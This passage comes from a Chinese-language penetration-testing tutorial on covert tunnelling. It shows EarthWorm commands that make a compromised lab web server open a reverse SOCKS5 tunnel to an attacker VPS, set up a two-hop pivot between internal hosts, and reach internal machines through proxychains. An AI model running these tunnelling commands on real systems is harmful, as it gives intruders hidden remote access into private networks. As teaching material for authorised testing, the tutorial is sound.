内网渗透测试：隐藏通讯隧道技术（下）(5)

打开内网Windows server 8的远程桌面：

proxychains4 rdesktop 192.168.52.138

（2）反弹 SOCKS 5 服务器

正向 SOCKS 5 服务器适用于目标机器拥有一个外网IP地址的情况下，假设目标机器没有公网IP的情况下，我们怎么访问内网的资源呢？

在这个测试环境中，与上一个相似，只是web服务器没有了公网IP，但能上网；VPS是真的公网vps了。

在攻击者公网vps上面上传ew_for_linux64并执行：

./ew_for_linux64 -s rcsocks -l 1080 -e 1234

该命令的意思是在vps上添加一个转接隧道，监听1234，把本地1234端口收到的代理请求转交给1080端口，这里1234端口只是用于传输流量。

接着，在内网web服务器（192.168.52.143）上传ew_for_Win.exe，并执行命令：

ew_for_Win.exe -s rssocks -d 39.xxx.xxx.210 -e 1234

该命令的意思是在受害者web服务器上启动SOCKS5服务，并反弹到公网IP地址为39.xxx.xxx.210的1234端口上。此时vps上面显示“rssocks cmd_socket OK!”说明连接成功：

现在就可以在攻击者计算机上面配置proxychains或SocksCap64等工具通过访问公网vps（39.xxx.xxx.210）的1080端口来使用内网web服务器上面架设的socks4代理服务了。如我们打开内网文件服务器的远程桌面：

proxychains4 rdesktop 192.168.52.141

（3）二级网络环境(a)

适用于目标机器拥有一个外网IP地址的情况下。

右侧内网A主机有两个网卡，一个连接外网（192.168.1.7），另一个只能连接内网的B主机，但不能访问内网中的其他主机资源。B主机可以访问内网其他资源，但不能访问外网。假设我们已经获得了A主机和B主机的控制权。

我们先将ew上传至B主机上面，并用ssocksd方式启动1234端口的正向socks代理：

ew_for_Win.exe -s ssocksd -l 1234

接着，将ew上传至A主机中，并执行命令：

ew_for_Win.exe -s lcx_tran -l 1080 -f 192.168.52.138 -g 1234

该命令将A主机1080端口收到的代理请求转发给B主机（192.168.52.138）的1234端口。

现在，我们就可以通过访问A主机的公网IP（192.168.1.7）的1080端口来使用架设在B主机上的socks代理服务了。配置proxychains：

用ssh连接内网服务器（192.168.52.128）：